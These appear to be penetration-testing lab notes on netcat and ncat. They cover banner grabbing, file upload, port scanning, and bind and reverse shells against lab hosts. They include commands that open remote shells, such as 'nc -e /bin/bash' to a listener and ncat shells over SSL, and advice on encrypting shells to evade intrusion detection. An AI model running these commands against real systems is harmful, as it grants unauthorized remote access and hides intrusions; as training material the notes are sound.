NETCAT AND NCAT
Banner Grabbing - SMTP:
Let's see if we can get any interesting information from this machine or its banners.
The syntax below is the target IP followed by the port number being targeted.
#nc -nv 10.11.25.139 25
The output of this command shows that SMTP port 25 is open and the SMTP banner is displayed:
"220 localhost ESMTP is server is ready."
Since SMTP is a clear-text protocol, we can interact with the service directly. Let's try typing HELP.
The server responds with the mail server account name 'Maiser' along with a list of recognised SMTP commands.
Banner Grabbing - POP3:
Let's try connecting to port 110 next - POP3.
#nc -nv 10.11.25.139 110
The output shows that the port is open; we get the POP3 service banner and a prompt to enter POP3 credentials:
"+OK <753110.63@localhost>, POP3 server ready"
We can continue using netcat to interact with the POP3 server.
Since we do not have the right username and password combination, the logon attempt fails.
Banner Grabbing - IMAP:
Let's try connecting to the IMAP port, TCP port 143.
#nc -nv 10.11.25.139 143
The output shows that the port is open and provides the banner. The IMAP banner in this example is more verbose, as it gives the version in addition to the program name.
"OK localhost IMAP4rev1 Mercury/32 v4.5 server ready"
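As an added example (not part of these notes), a small Python banner grabber that reads only the greeting the server volunteers and classifies it by the SMTP, POP3 and IMAP formats seen above; serve_banner_once is a constructed loopback stand-in for a mail server, and the version-hint regex is an assumed heuristic:

```python
import re
import socket
import threading

# Greeting formats for the three mail services probed above (SMTP, POP3, IMAP4).
# The IMAP pattern tolerates a missing leading "* " because the quoted banner above lacks it.
BANNER_PATTERNS = {
    "smtp": re.compile(r"^220[ -](?P<host>\S+)"),
    "pop3": re.compile(r"^\+OK\b"),
    "imap": re.compile(r"^(?:\*\s+)?OK\b"),
}
# Assumed heuristic: tokens like "Mercury/32 v4.5" or "Postfix 3.6.1" are a product/version hint.
VERSION_HINT = re.compile(r"([A-Za-z][\w.-]*(?:/\d+)?\s+v?\d+(?:\.\d+)+)")

def parse_banner(line: str) -> dict:
    """Classify one greeting line and pull out the product/version hint if the server leaks one."""
    line = line.strip()
    for proto, pat in BANNER_PATTERNS.items():
        if pat.match(line):
            hint = VERSION_HINT.search(line)
            return {"protocol": proto, "banner": line,
                    "version_hint": hint.group(1) if hint else None}
    return {"protocol": "unknown", "banner": line, "version_hint": None}

def grab_banner(host: str, port: int, timeout: float = 3.0) -> dict:
    """Connect, read the first line the server sends on its own, and close without sending anything."""
    data = b""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.settimeout(timeout)
        while not data.endswith(b"\n") and len(data) < 512:
            chunk = s.recv(256)
            if not chunk:
                break
            data += chunk
    return parse_banner(data.decode("latin-1", "replace"))

def serve_banner_once(banner: bytes) -> int:
    """Constructed stand-in for a mail server (not part of the notes): sends one greeting
    line to the first client and closes. Returns the loopback port it listens on."""
    srv = socket.socket()
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)
    def _serve():
        conn, _ = srv.accept()
        conn.sendall(banner)
        conn.close()
        srv.close()
    threading.Thread(target=_serve, daemon=True).start()
    return srv.getsockname()[1]
```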
Transferring a file with Netcat:
Netcat can also be used to transfer both text and binary files from one machine to another.
We will now upload a file to the Windows machine from the Kali box.
On the Windows machine, we set up a netcat listener as we did earlier, although this time we redirect any input into a file called incoming.exe:
C:\>nc -nvlp 4444 >incoming.exe
Now any incoming data on port 4444 will end up in the file incoming.exe.
From the Kali machine we locate wget.exe and then upload it over netcat, feeding the file to nc on standard input:
#nc -nv 10.11.25.139 4444 < wget.exe
In this case we do not see any feedback from the Windows server that the file upload has completed.
To verify that the upload did complete, run incoming.exe on the Windows 7 machine and make sure it behaves just like wget.exe.
Netcat Bind Shell:
Bob is on the Windows machine.
Alice is on the Kali machine.
Imagine Bob has a public IP address and is connected to the internet.
Alice's computer is located in a corporate network behind a firewall, making her machine inaccessible and not routable from the internet.
Bob needs Alice to connect to his computer and take care of it for administration purposes. First Bob sets up a listener that executes cmd.exe for whoever connects; this requires adding -e cmd.exe to the standard nc listener, e.g.:
c:\>nc -lvp 4444 -e cmd.exe
After Bob has run the above command, anyone connecting to his IP on port 4444 will be presented with a command prompt on his machine.
Alice now connects:
#nc -nv 10.11.25.139 4444
Alice now has an interactive Windows shell on Bob's machine.
Netcat Reverse Shell:
This is a more interesting scenario.
Now Alice needs help from Bob. Bob needs to connect to her Linux machine, which sits behind the corporate firewall.
Alice is unable to accept incoming connections from Bob, but she can make outbound connections, which allows her to connect to Bob with a netcat session tied to a local shell. Once this connection is made, Bob will have access to her computer and will be able to execute commands.
Bob needs to set up a netcat listener and wait for incoming connections:
C:\> nc -lvp 4444
Alice connects to Bob's listener:
#nc -nv 10.11.25.139 4444 -e /bin/bash
Once the connection is made, Bob can execute Linux commands from the Windows command prompt.
We now have a bash shell sent from Alice's Linux machine behind the corporate firewall to Bob's Windows machine.
Netcat - ACTIVE INFORMATION GATHERING: Connect Scan
In this technique, completing the 3-way handshake indicates that the port is open.
eg: A simple connect scan between ports 3385 and 3389 on 10.11.1.13.
#nc -nvv -w 1 -z 10.11.1.13 3385-3395
Netcat - ACTIVE INFORMATION GATHERING: SYN Scan
SYN scanning is also known as half-open or stealth scanning.
SYN packets are sent without completing the TCP handshake: if the TCP port is open, a SYN/ACK should come back from the target machine, and the scanner never sends the final ACK.
This used to bypass old and primitive firewalls, whose logging was limited to completed TCP sessions. That is no longer true, and SYN scans will be detected.
Netcat - ACTIVE INFORMATION GATHERING: UDP Scan
Since UDP is stateless, it does not require a 3-way handshake, so the mechanism behind UDP port scanning differs from TCP.
eg: A UDP scan of the host at 10.11.1.13 over the port range 160-165.
#nc -unvv -w 1 -z 10.11.1.13 160-165
If a port is closed, an ICMP destination-unreachable packet is returned. If a port is open, no response at all is received. Because of this, UDP scanning is often unreliable: firewalls and routers may drop ICMP packets altogether, so a filtered port looks the same as an open one and produces false positives in our scans.
One drawback of using netcat for bind and reverse shells is that it lacks encryption and has no way to limit which hosts may connect. Encrypting the bind or reverse shell helps the pen tester avoid detection by Intrusion Detection Systems. Limiting access to the shell ensures that other machines cannot use it.
** When possible, tools like "Ncat" and "sbd" should be used instead of netcat.
Ncat has many more features than netcat, including SSL encryption and the ability to whitelist access to specific IPs.
NCAT: Bind Shell
Let's use Ncat to create a more secure bind shell between Bob and Alice.
Bob will use Ncat to set up an SSL-encrypted bind shell on port 4444 and allow only Alice's IP to connect to it.
First copy ncat into the Windows directory so that it is in your path.
Bob sets up an ncat listener that allows only Alice's IP and uses SSL encryption:
C:\>ncat -lvp 4444 -e cmd.exe --allow 10.11.0.179 --ssl
Alice now uses ncat to connect to Bob's IP on port 4444 using SSL:
#ncat -v 10.11.25.139 4444 --ssl
The shell between Bob's machine and Alice's computer is now encrypted. How do we know that our traffic is indeed no longer in clear text? Let's use Wireshark for this.
NCAT: Reverse Shell
I used what I had learned above to create a reverse shell over SSL with restricted access:
On Bob's machine, I set up a listener:
C:\>ncat -lvp 4444 --ssl --allow 10.11.0.179
On Alice's machine I connect to Bob, offering a bash shell:
#ncat -nv 10.11.25.139 4444 -e /bin/bash --ssl